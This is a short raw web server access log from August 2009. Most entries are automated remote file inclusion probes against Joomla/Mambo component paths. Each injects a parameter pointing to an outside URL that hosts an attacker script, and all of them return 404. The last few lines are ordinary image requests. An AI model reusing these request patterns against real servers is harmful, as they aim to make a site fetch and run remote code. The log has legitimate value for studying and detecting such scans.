117.110.74.195 - - [12/Aug/2009:08:06:27 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.superuser.co.kr/session/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:08:06:30 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:08:06:30 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:08:06:30 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Aug/2009:08:06:42 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.17.141.172 - - [12/Aug/2009:08:07:12 -0400] "GET //includes/errors.php?error=http://www.mistresslorisdungeon.com/chat/inc/cmses/kontol.txt? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
67.15.225.39 - - [12/Aug/2009:08:07:14 -0400] "GET /logs/error_log.Q109061900%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.geejohn.com/id.txt%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
155.212.230.34 - - [12/Aug/2009:08:07:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
155.212.230.34 - - [12/Aug/2009:08:07:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
155.212.230.34 - - [12/Aug/2009:08:07:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
